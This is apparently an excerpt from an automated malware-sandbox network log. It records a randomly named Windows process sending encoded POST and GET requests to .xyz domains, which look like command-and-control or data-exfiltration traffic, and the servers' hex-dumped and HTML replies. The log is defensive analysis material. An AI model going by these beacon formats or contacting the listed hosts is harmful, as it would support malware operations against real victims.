Jan 10, 2025 19:56:22.609561920 CET	794	IN	Data Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/jta9; Max-Age=0Set-Cook
Jan 10, 2025 19:56:22.609800100 CET	1236	IN	Data Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
Jan 10, 2025 19:56:22.609858990 CET	1236	IN	Data Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25 Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^\|9Vkn~WaO+P"SHmM:{\|[KuXM}j;h6aRz;FEP:uHqp-v1NG%61@pEk$F
Jan 10, 2025 19:56:22.609869957 CET	448	IN	Data Raw: 5d 1e 60 fa 46 a8 6c ae 83 f7 89 cb a6 03 d7 d4 3c d8 ae 1b 2c e4 a0 07 8a cb b0 d3 56 0a bb a6 ae 07 3f c0 12 3c 90 6b f7 07 9f 7c a0 b5 35 d0 3a 9c 23 6d 2b 35 a2 b6 fd 7e ff 43 e5 fb 17 1f 63 b4 a1 c7 e2 c4 b2 f1 22 9b 3a 02 b3 d4 5c ff c8 5d Data Ascii: ]`Fl<,V?<k\|5:#m+5~Cc":\]6'iVSmzo=}Wz>O7#bl}JiGmrPbZsS;C]^Vw\=,pE2Tb&,i<#)7h\Or$j&exXG
Jan 10, 2025 19:56:22.609882116 CET	1236	IN	Data Raw: 8b 2a 7c 52 c5 da ed 2e 55 56 2b 2d 92 57 88 a0 48 0b 3f 7e f6 72 5c 97 d2 72 cd 47 a2 fc 1e 30 d5 7d e8 9f 1f 1f f5 f7 34 f0 96 8e 6c 95 fa 41 fc 98 84 01 a3 6d ae b9 c1 72 61 f9 bd 4c e9 49 78 45 0e c3 2b cd 0b 9b e2 3d b5 f8 1c 44 80 98 5a 71 Data Ascii: \|R.UV+-WH?~r\rG0}4lAmraLIxE+=DZq5\|k5zU,{Ypj+K19V^y-Ahu/XEVM?+4[,M]WKwiA!MsuE78aQ:%g?k@
Jan 10, 2025 19:56:22.609894037 CET	1004	IN	Data Raw: 9a cc ae 3a e1 13 39 e3 93 15 29 cc 67 e5 eb a4 50 af da 9f 88 bc 4e 37 c4 30 45 13 39 47 af 0f eb 60 4f c1 c2 34 5e 44 72 43 a6 00 1c 92 56 96 04 b0 45 49 0c 3f 00 2e 72 a7 f5 14 ab 98 60 33 a2 4b 57 5d 57 44 59 32 11 88 a5 b5 7d ad e2 b0 7f dc Data Ascii: :9)gPN70E9G`O4^DrCVEI?.r`3KW]WDY2}=\|~{9Eq/bH\|FDGA)/WDS\<"E}Agdr)mNtL.GVI%6h&-lc*-ZH3WGkhf^:mnx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49730	18.139.62.226	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:24.204663038 CET	1748	OUT	POST /jta9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.jotchuadog.xyz Origin: http://www.jotchuadog.xyz Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.jotchuadog.xyz/jta9/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 58 44 75 56 79 37 43 44 72 71 31 43 76 56 65 6d 6b 5a 79 57 74 77 4b 4d 6f 31 30 35 68 77 46 74 6a 6e 79 5a 4f 73 2f 48 6c 67 42 7a 69 56 38 73 4b 57 37 45 6c 34 48 61 5a 45 76 55 72 51 64 76 39 59 70 7a 37 4a 58 70 57 2f 6a 69 50 66 58 44 31 6e 44 36 73 65 59 54 5a 4e 64 38 76 41 46 4d 35 70 58 47 51 6c 51 49 44 31 38 75 48 4e 46 4b 62 4a 43 64 2f 2f 64 64 49 59 50 61 44 6b 79 7a 53 7a 31 77 34 56 43 52 65 34 41 57 39 6e 4d 77 49 64 64 55 58 42 66 47 43 6a 54 38 6b 50 30 72 62 4b 37 6c 33 6f 4c 42 34 55 59 37 5a 64 66 67 41 75 58 41 49 66 72 6f 6b 48 75 55 7a 61 55 58 41 4a 79 2b 2b 50 65 50 31 32 43 61 6b 32 4b 52 56 78 4e 47 53 38 6f 4e 74 44 6c 31 76 76 69 72 48 6b 30 44 53 31 64 79 4e 4a 30 72 48 71 59 6a 66 36 6f 72 4e 4e 52 6f 72 52 50 6a 66 48 75 63 6a 61 64 53 78 6f 65 2f 76 54 62 4d 44 36 6b 2f 51 4e 67 73 52 64 34 30 53 49 42 4f 76 38 62 34 66 5a 41 38 61 6d 46 2f 31 37 34 7a 41 46 70 67 44 30 37 72 41 47 44 31 4e 68 61 33 36 63 31 7a 4b 46 45 54 76 70 6c 2f 59 2b [TRUNCATED] Data Ascii: QzmLxn8=XDuVy7CDrq1CvVemkZyWtwKMo105hwFtjnyZOs/HlgBziV8sKW7El4HaZEvUrQdv9Ypz7JXpW/jiPfXD1nD6seYTZNd8vAFM5pXGQlQID18uHNFKbJCd//ddIYPaDkyzSz1w4VCRe4AW9nMwIddUXBfGCjT8kP0rbK7l3oLB4UY7ZdfgAuXAIfrokHuUzaUXAJy++PeP12Cak2KRVxNGS8oNtDl1vvirHk0DS1dyNJ0rHqYjf6orNNRorRPjfHucjadSxoe/vTbMD6k/QNgsRd40SIBOv8b4fZA8amF/174zAFpgD07rAGD1Nha36c1zKFETvpl/Y+CHKhJPesPeOxZ4g2amwZEZbpDF5CkR5bUKRBL5baEC3BgKGatAoXQWVXGIqek8/Ua+nqmpT7OHUEsO+t/ATWIdBqzqyEg0USvLcoNe58SDV0MB08pN9wVDoflPZEt9o/m+5WgmFb5thMlIvCUuA9Cx4vThcdOhdUi5rRcEfC3nhYGCqZWmMC2mckPBFOm10+QbAlPWDsLcqebJe4+KwH7jh+Sv69BoPFhK3YKio+z/KoPIU+DFcelmZKx/R6QX7+MsXRclQ7lGaAtR7oTzYVYpXpfUgI82PTS5kyw+4wwdCG7PRVWmGn0WmsZ6pU+i6ia6GyDFG5aKwU1uTCjDFr98mhOy4CR7Og7OpXDqc4BL2jUeqRhjjze4i/NiP5Ce6BamWymG+IoJOCN6AFzsNkKRtif5xwf/Ix3R7in3vZTX7jXpVp16bQvKZTYuCkTyzWF47a4jhutnh3UYNy/gq/Rcao9pvtAw3HW1bRj+kjieXsvsR8q06smThi6Y30NO5dFZiBC23Wf7NjLdL2aBaiZJ9qUfuT2F/o5UV71txRYUq1Aax/lKkXCu9cbxbH0R7iLnliqT7UJp/rM1UobYcOCOBxLf+1bt45ZZX+uA6i7TIxLViw3gJKbwYm3/31Q8QGoMq+kiM9F0+4cEuPwU5XbWx+TieXuGI426 [TRUNCATED]
Jan 10, 2025 19:56:25.171396971 CET	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 10 Jan 2025 18:56:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jan 10, 2025 19:56:25.171438932 CET	224	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-10 18:56:24.99861202
Jan 10, 2025 19:56:25.171477079 CET	1236	IN	Data Raw: 39 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 31 36 32 32 33 31 2e 30 37 31 36 35 36 32 34 31 22 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 38 20 4a 61 6e 20 32 30 33 35 20 31 38 3a 35 36 3a 32 34 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b Data Ascii: 9 +0000 UTC m=+1162231.071656241"; Expires=Mon, 08 Jan 2035 18:56:24 GMTSet-Cookie: LADI_CLIENT_ID=5d2ccb28-4ac4-4ebf-58ae-5992c342d064; Expires=Mon, 08 Jan 2035 18:56:24 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/jta9; Expires=Mon, 08 Jan 203
Jan 10, 2025 19:56:25.171514034 CET	1236	IN	Data Raw: 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 Data Ascii: ; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/jta9; Max-Age=0Set-Cook
Jan 10, 2025 19:56:25.171549082 CET	570	IN	Data Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVI
Jan 10, 2025 19:56:25.171727896 CET	1236	IN	Data Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
Jan 10, 2025 19:56:25.171765089 CET	224	IN	Data Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25 Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^\|9Vkn~WaO+P"SHmM:{\|[KuXM}j;h6aRz;FEP:uHqp-v1NG%
Jan 10, 2025 19:56:25.171799898 CET	1236	IN	Data Raw: 36 31 ce 40 0c d3 1f 0c 70 1c 45 6b 24 46 eb 8d 94 bd b3 65 12 a4 6a 12 01 19 cb 18 b8 10 5e ad 4b 25 99 f7 57 15 9c 04 ce 87 74 af 4f 0f 00 eb de a0 33 52 b8 22 63 53 f7 d2 df 03 1a fb 80 99 f4 29 97 92 0b 87 bd 82 8f 39 cc 58 62 01 51 16 92 a0 Data Ascii: 61@pEk$Fej^K%WtO3R"cS)9XbQc"!fI!p9h'+n\|-6ud0vQ4PkU- E+AC?I4H6OZ~}U\|qr.!lpBNr>/) G%Y^F
Jan 10, 2025 19:56:25.171834946 CET	1236	IN	Data Raw: 9e a3 ca 98 6a e5 05 bf ac 26 65 8f b8 b4 d3 78 ce 58 47 05 9e 78 af 8f 7f f9 7c fc 7e f1 20 78 2b 6d 55 80 65 d9 dc f3 ca f7 c0 16 60 ae 5e 05 64 c9 de ea 50 bd 6f 11 d4 9f c2 a8 09 52 df 2c ae 41 76 1d d7 97 3a 38 71 89 f1 43 cf 4b 25 14 a2 bf Data Ascii: j&exXGx\|~ x+mUe`^dPoR,Av:8qCK%$r@kbt]S^ZjYJJa%xG5aSF>&C=\|u]I<$X^y !z^??_<Wyju%NZVaV\`T,4M$*\|R.UV+-WH?
Jan 10, 2025 19:56:25.171857119 CET	1228	IN	Data Raw: 19 17 bb 8b d9 4a bb 01 58 d8 36 e8 ef e7 89 42 d2 e4 11 d9 ea 62 b0 9f 3b 57 f1 5c 1f 89 9a 46 17 49 d9 f4 f4 21 1a b8 3e de 33 2e 67 fa d0 4f b7 8f 7a bd 5c c7 31 05 c5 70 02 2b c9 73 0b d3 17 d6 a5 04 b9 9c 83 a2 89 ed 45 74 4e d8 a9 01 bb 54 Data Ascii: JX6Bb;W\FI!>3.gOz\1p+sEtNT5AS5@cUG1/,n=V$F=}^i,`XA#jfUN0S9OVX)lU2W~4c{!dv*:9)gP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49747	18.139.62.226	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:26.743978977 CET	445	OUT	GET /jta9/?QzmLxn8=aBG1xMS6m7FLsC69vOjBghyHvRsr9Spq803CGIDTsDF9/H4vSnP1v5yRfjX7qXp247VX2YmsQ7adDqrLglTstOMpeb0fzTtK3PukXCEJIRUSabZMf5f58Y9RP5TmZgvAHg==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.jotchuadog.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:56:27.727960110 CET	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 10 Jan 2025 18:56:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jan 10, 2025 19:56:27.727976084 CET	224	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-10 18:56:27.55113578
Jan 10, 2025 19:56:27.728033066 CET	1236	IN	Data Raw: 33 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 31 36 32 32 33 33 2e 36 32 34 31 37 39 39 39 36 22 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 38 20 4a 61 6e 20 32 30 33 35 20 31 38 3a 35 36 3a 32 37 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b Data Ascii: 3 +0000 UTC m=+1162233.624179996"; Expires=Mon, 08 Jan 2035 18:56:27 GMTSet-Cookie: LADI_CLIENT_ID=43385294-d49f-45ee-676e-a178e5dabbdd; Expires=Mon, 08 Jan 2035 18:56:27 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/jta9; Expires=Mon, 08 Jan 203
Jan 10, 2025 19:56:27.728080988 CET	224	IN	Data Raw: 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 Data Ascii: ; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/jta9;
Jan 10, 2025 19:56:27.728090048 CET	1236	IN	Data Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 43 4f 4e 46 49 47 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/jta9; Max-Age=0Set-Cookie: LADI_FUNNEL_NEXT_URL=; Path=/jta9; Max-Age=0Set-Cookie: LADI_FUNNEL_PREV_URL=; Path=/jta9; Max-Age=0Set-Co
Jan 10, 2025 19:56:27.728106976 CET	224	IN	Data Raw: 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 46 4f 52 4d 53 55 42 4d 49 54 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 Data Ascii: e: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/jta9; Max-Age=0Statuscode: 502Strict-Transport-Security: max-age
Jan 10, 2025 19:56:27.728117943 CET	1236	IN	Data Raw: 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 58 73 73 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 Data Ascii: =31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=block62e7<!DOCTYPE html><html><head><meta charset="UTF-8"><title>404</title><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Ex
Jan 10, 2025 19:56:27.728127956 CET	224	IN	Data Raw: 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 2e 6c 61 64 69 63 64 6e 2e Data Ascii: fonts.googleapis.com/" crossorigin><link rel="preconnect" href="https://w.ladicdn.com/" crossorigin><link rel="preconnect" href="https://api.forms.ladipage.com/" crossorigin><link rel="preconnect" href="https://la.ladipage.c
Jan 10, 2025 19:56:27.728137970 CET	1236	IN	Data Raw: 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 Data Ascii: om/" crossorigin><link rel="preload" href="https://fonts.googleapis.com/css?family=Open Sans:bold,regular&display=swap" as="style" onload="this.onload = null;this.rel = 'stylesheet';"><style id="style_ladi" type="text/css">a,abbr,acronym,addre
Jan 10, 2025 19:56:27.728148937 CET	224	IN	Data Raw: 64 6a 75 73 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 7d 2e 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6c 61 64 69 2d 74 72 Data Ascii: djust:none;-webkit-text-size-adjust:none}.overflow-hidden{overflow:hidden}.ladi-transition{transition:all 150ms linear 0s}.ladipage-message{position:fixed;width:100%;height:100%;top:0;left:0;z-index:1000000000;background:rgb
Jan 10, 2025 19:56:27.733093977 CET	1236	IN	Data Raw: 61 28 30 2c 30 2c 30 2c 2e 33 29 7d 2e 6c 61 64 69 70 61 67 65 2d 6d 65 73 73 61 67 65 20 2e 6c 61 64 69 70 61 67 65 2d 6d 65 73 73 61 67 65 2d 62 6f 78 7b 77 69 64 74 68 3a 34 30 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 Data Ascii: a(0,0,0,.3)}.ladipage-message .ladipage-message-box{width:400px;max-width:calc(100% - 50px);height:160px;border:1px solid rgba(0,0,0,.3);background-color:#fff;position:fixed;top:calc(50% - 155px);left:0;right:0;margin:auto;border-radius:10px}.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49791	199.59.243.228	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:33.170461893 CET	735	OUT	POST /oh72/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.dating-apps-az-dn5.xyz Origin: http://www.dating-apps-az-dn5.xyz Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.dating-apps-az-dn5.xyz/oh72/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 43 67 5a 4e 31 42 7a 72 6d 6a 54 51 54 44 5a 59 4d 67 51 65 4f 4b 34 6b 62 4c 58 56 6a 53 56 4b 35 7a 37 63 58 49 4c 69 62 45 70 4b 4d 71 70 48 57 47 58 61 55 77 63 63 66 63 57 4d 6e 4c 69 35 69 4d 53 34 4c 46 2b 36 46 49 58 4b 2b 6d 6c 4a 44 41 52 42 78 73 4f 45 55 52 66 44 35 44 67 37 61 34 5a 55 67 47 76 5a 32 76 79 41 2b 67 6c 6e 43 63 48 5a 76 53 77 50 65 55 43 4c 4d 30 4e 36 52 67 6e 4c 68 47 58 61 61 63 6b 4a 75 44 68 69 51 54 38 75 6e 6f 68 77 45 2f 38 76 66 4b 47 69 5a 37 6f 4f 39 4d 56 77 65 44 37 49 68 7a 55 70 4b 34 4c 59 42 4c 62 48 64 45 38 62 4c 4c 55 33 5a 6a 43 48 50 50 67 3d Data Ascii: QzmLxn8=CgZN1BzrmjTQTDZYMgQeOK4kbLXVjSVK5z7cXILibEpKMqpHWGXaUwccfcWMnLi5iMS4LF+6FIXK+mlJDARBxsOEURfD5Dg7a4ZUgGvZ2vyA+glnCcHZvSwPeUCLM0N6RgnLhGXaackJuDhiQT8unohwE/8vfKGiZ7oO9MVweD7IhzUpK4LYBLbHdE8bLLU3ZjCHPPg=
Jan 10, 2025 19:56:33.609134912 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:56:33 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 92f185f0-880d-4669-afb1-6c7c73dea0b0 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OOCfvkkgyNxpHuIQpteUJlJqXeFIh3FYb49C9+itooWN47l77d343V0Syzm1QGnfqoPRXHsI7FyD+QItIsHMKA== set-cookie: parking_session=92f185f0-880d-4669-afb1-6c7c73dea0b0; expires=Fri, 10 Jan 2025 19:11:33 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 4f 43 66 76 6b 6b 67 79 4e 78 